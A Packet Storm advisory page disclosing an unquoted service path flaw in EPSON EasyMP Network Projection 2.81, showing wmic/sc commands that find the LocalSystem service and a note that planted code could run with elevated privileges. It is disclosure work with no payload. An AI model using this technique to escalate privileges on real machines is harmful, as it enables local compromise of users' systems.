what you don't know can hurt you

EPSON EasyMP Network Projection 2.81 Unquoted Service Path

EPSON EasyMP Network Projection 2.81 Unquoted Service Path
Posted Feb 14, 2020
Authored by Roberto Pina

EPSON EasyMP Network Projection version 2.81 suffers from an unquoted service path vulnerability.

tags | exploit
MD5 | a7bf44d47eaf048122f2dfeb2a325075

EPSON EasyMP Network Projection 2.81 Unquoted Service Path

Change Mirror Download
# Exploit Title: EPSON EasyMP Network Projection 2.81 - 'EMP_NSWLSV' Unquoted Service Path
# Discovery by: Roberto PiƱa
# Discovery Date: 2020-02-13
# Vendor Homepage: https://epson.com/support/easymp-network-projection-v2-86-for-windows
# Software Link :https://ftp.epson.com/drivers/epson16189.exe
# SEIKO EPSON CORP
# Tested Version: 2.81
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Home x64 en

# Step to discover Unquoted Service Path:


C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "EPSON" | findstr /i /v """
EMP_NSWLSV EMP_NSWLSV C:\Program Files (x86)\EPSON Projector\EasyMP Network Projection V2\EMP_NSWLSV.exe Auto

C:\>sc qc "EMP_NSWLSV"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: EMP_NSWLSV
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\EPSON Projector\EasyMP Network Projection V2\EMP_NSWLSV.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : EMP_NSWLSV
DEPENDENCIES : RPCSS
SERVICE_START_NAME : LocalSystem

#Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.
Login or Register to add favorites

File Archive:

October 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    25 Files
  • 2
    Oct 2nd
    13 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    1 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    15 Files
  • 7
    Oct 7th
    15 Files
  • 8
    Oct 8th
    11 Files
  • 9
    Oct 9th
    3 Files
  • 10
    Oct 10th
    1 Files
  • 11
    Oct 11th
    1 Files
  • 12
    Oct 12th
    8 Files
  • 13
    Oct 13th
    12 Files
  • 14
    Oct 14th
    23 Files
  • 15
    Oct 15th
    4 Files
  • 16
    Oct 16th
    13 Files
  • 17
    Oct 17th
    1 Files
  • 18
    Oct 18th
    1 Files
  • 19
    Oct 19th
    27 Files
  • 20
    Oct 20th
    41 Files
  • 21
    Oct 21st
    18 Files
  • 22
    Oct 22nd
    10 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close